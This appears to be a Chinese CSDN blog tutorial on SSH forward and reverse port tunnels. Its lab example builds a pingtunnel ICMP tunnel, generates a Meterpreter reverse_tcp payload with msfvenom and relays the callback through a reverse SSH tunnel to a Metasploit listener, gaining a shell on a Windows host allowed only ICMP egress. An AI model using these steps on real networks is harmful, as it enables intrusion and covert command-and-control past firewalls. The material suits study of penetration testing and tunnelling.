ssh正反隧道(代理msf对icmp穿透监听)

最新推荐文章于 2024-06-08 00:30:00 发布
最新推荐文章于 2024-06-08 00:30:00 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: ssh 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/130735513
版权

ssh正向隧道:

就是将本地端口映射到远程上,相当访问本地端口就是访问远程的端口

正向        访问本地对应的是远程的端口

ssh -fNCL    本地ip:本地port:远程ip:远程port    用户@远程ip/域名

实例:

ssh -fNCL   192.168.222.128:90:192.168.222.132:80  hjw123@192.168.222.132

这里添加192.168.222.128是可以在内网主机都可以访问云中的资源,在本地访问localhost:90,即可访问192.168.222.132:80端口

ssh反向隧道:

相反,就是将远程端口映射到本地,访问远程端口相当访问本地

反向        访问远程端口对应的是本地的端口

ssh  -fNCR   0.0.0.0:远程ip:本地ip:本地端口    远程用户名@远程ip

 这里还需要对远程地址的/etc/ssh/sshd_config配置下,将GateWayPorts改为yes,很容易理解,为了安全

 
实例:

ssh -fNCR 0.0.0.0:7777:192.168.222.128:80  hjw123@192.168.222.132

我们访问192.168.222.132:7777

参数介绍:

-f 后台执行ssh指令
-C 允许压缩数据
-N 不执行远程指令
-R 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口
-L 将本地机(客户机)的某个端口转发到远端指定机器的指定端口
-p 指定远程主机的端口

实例应用

这是一个wind为服务器,只允许icmp出网,这里我们通过ubuntu进行icmp隧道代理出来,然后使用ssh反向隧道使用msf监听本地端口等shell上线。

pingtunnel启动服务端:192.168.222.132

./pingtunnel -type server  -nolog 1 -noprint 1

pingtunnel启动客户端:192.168.222.136

pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.222.132 -t 192.168.222.132:7890 -tcp 1 -nolog 1

这里-l 127.0.0.1:9999将本地的9999流量交给-s  192.168.222.132 ,-t  192.168.222.132:7890给到他的7890端口

使用msf生成shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1  lport=9999  -f exe > hjw.exe

这里是给到本地的9999端口是对应上面的win主机,上传给win主机

开启ssh反向隧道,使linux的7890端口对应到本地的51111端口

ssh -fNCR 0.0.0.0:7890:192.168.222.128:51111 hjw123@192.168.222.132

 我们开启msf对本地的51111端口监听

 现在双击shell,msf成功连接

我们可以使用这个方法做很多事情,这样我们的工具可以放到本地,然后直接使用vps的端口代理到本地,避免服务器资源的消耗。

不习惯有你
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssh反向隧道_什么是反向SSH隧道? (以及如何使用)
cumai3211的博客
10-07 3698
ssh反向隧道Eny Setiyowati/Shutterstock.comEny Setiyowati / Shutterstock.comNeed to SSH to an unreachable Linux computer? Have it call you, then burrow down that connection to get your own remote SSH sessi...
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使...
远程SSH连接树莓派, SSH反向隧道访问树莓派(使用阿里云服务器以及树莓派4b)
qq_61585528的博客
02-04 521
SSH反向隧道访问树莓派,远程连接树莓派(使用阿里云以及树莓派4b)
SSH搭建反向隧道
江冷易水寒
04-17 1748
一、起因: 最近因为疫情在上网课的时候,我同学linux系统碰到了问题,要我帮他看下。我原本是通过一个QQ远程桌面连过去,但是通过QQ桌面无法控制他虚拟机上的Linux。所以ssh过去是最好的方法,不过他的电脑跟我不在一个局域网,又是虚拟机,要怎么连过去呢? 客户端(内网主机)通过ssh连接公网服务器(如阿里云服务器)时,称为正向隧道; 公网服务器(例如阿里云服务器)通过ssh连接客户端(内...
内网基础-隧道技术、内网穿透(SSH隧道、Socket隧道、跨路由扫描)
最新发布
wholeliubei的博客
06-08 1037
如果你也想学习:黑客&网络安全的零基础攻防教程。
使用 SSH 反向隧道进行内网穿透
JL-LOVE
04-06 2693
对应的情况 这篇文章主要介绍了如何利用 SSH 反向隧道穿透 NAT,并演示了如何维持一条稳定的 SSH 隧道。 假设有机器 A 和 B,A 有公网 IP,B 位于 NAT 之后并无可用的端口转发,现在想由 A 主动向 B 发起 SSH 连接。由于 B 在 NAT 后端,无可用 公网 IP + 端口这样一个组合,所以 A 无法穿透 NAT,这篇文章应对的就是这种情况。 首先有如下约定,因为很重要所以放在前面: 机器代号 机器位置 地址 账户 ssh/sshd 端口 是否需要运行 sshd A 位
ssh 反向隧道
BigTiger的博客
08-19 4898
早就听说过ssh反向隧道,却一直没有尝试过,今日偶得之,简单做个记录。 ssh反向隧道可以解决这样的场景: 比如在公司内部都是局域网,但是我想从公司外访问公司内的机器,该怎么办呢?当然了,vpn肯定没问题,但更快捷的方式就是ssh反向隧道。 为了简单明白,下面示例如何使用: 公网有台机器叫public,内网有台机器叫private,现在要实现从public到内网的访问,一条
SSH反向隧道
forfcw
05-31 239
【代码】SSH反向隧道
msf暴力破解ssh,最后一周学习总结
08-17
msf暴力破解ssh,最后一周学习总结
第一百二十三课:利用ssh隧道将公网meterpreter弹至本地的msf中1
08-03
1. 首先,我们需要先到自己的 ubuntu16-LAMP [vps]机器上开启 ssh 的端口转发功能,如下 3. payload 准备好之后,顺手继续在本地
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
建立ssh反向隧道
lu_linux的博客
04-17 356
一台有公网IP的服务器A一台内网的设备B一台客户端设备C。
SSH反向代理
热门推荐
zokie的专栏
01-10 3万+
说实话,我对反向代理这个概念并不熟悉,只是感觉以下要做的事是一个代理的逆向过程,故借此名词一用。   问题场景是这样的:我有两套Linux集群的访问权限,分别为A和B,它们互相独立。其中A、B集群均能访问外网,但只有A集群有公网IP,所以从外网直接登录B就不行。要解决的问题就是从外网能登录到B集群。   我对代理的理解是:一台不能访问外网的机器,通过局域网内一台可以访问外网的机器代理服务,
ssh 反向代理
guoke312的专栏
02-01 3097
系统版本:Centos7 这篇文章主要介绍了如何利用SSH 反向隧道穿透NAT,并演示了如何维持一条稳定的SSH 隧道。 1. 描述一下目前的机器状况,梳理梳理: 机器 IP 用户名 备注 A 10.21.32.106 gdut728 目标服务器,处于内网 B 123.123.123.123 root 外网服务器,相当于桥梁的作用 2. 解决方法: 通俗地说:就是在机器A上做到B机器的反向代理;然后在B机器上做正向的代理实现本地端口的转
ssh 反向代理举例
lepton126的专栏
03-25 4183
实验: 1、测试pc至 192.168.1.98:80,使用浏览器访问192.168.1.98:80正常页面 2、在192.168.1.97机器上输入          Ssh –f –N –L 0.0.0.0:2001:192.168.1.98:80 test@192.168.1.102          ssh -N -L2001:remotehost:80 user@somemac
干货:通过SSH反向隧道的方式配置Windows10远程3389端口
惘嘫、冋渞的专栏
10-29 2105
前两个安装OpenSSH服务端没有成功,Windows10安装OpenSSH服务端报0x80072ee6错误,用了第三种方法手动安装的。经过测试,win10默认就安装了OpenSSH客户端,不需要安装OpenSSH服务端,如果客户端没有安装,请参考下文。设置完成后,回到“应用”>“应用和功能”和“可选功能”,你应会看到已列出 OpenSSH。打开“设置”,选择“应用”>“应用和功能”,然后选择“可选功能”。输入服务器密码,成功后,窗口如卡住一样,窗口可以不关闭。
msf和frp内网穿透
08-19
msf和frp都是常用于内网穿透的工具,可以帮助远程访问和控制内网中的设备。 Metasploit Framework(简称msf)是一个开源的渗透测试框架,它提供了丰富的渗透测试工具和模块。虽然msf主要是用于渗透测试和漏洞利用,但它也可以通过反向连接来实现内网穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台,从而实现对内网设备的访问。 Frp是一个高性能的反向代理工具,可以帮助将内网服务暴露到公网中,实现内网穿透。通过在内网中启动Frp客户端,并在公网服务器上启动Frp服务器端,你可以将内网中的服务映射到公网IP上,从而实现对内网设备的远程访问。 总之,无论你选择使用msf还是frp,都可以帮助你实现内网穿透,让你可以方便地远程访问和控制内网中的设备。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值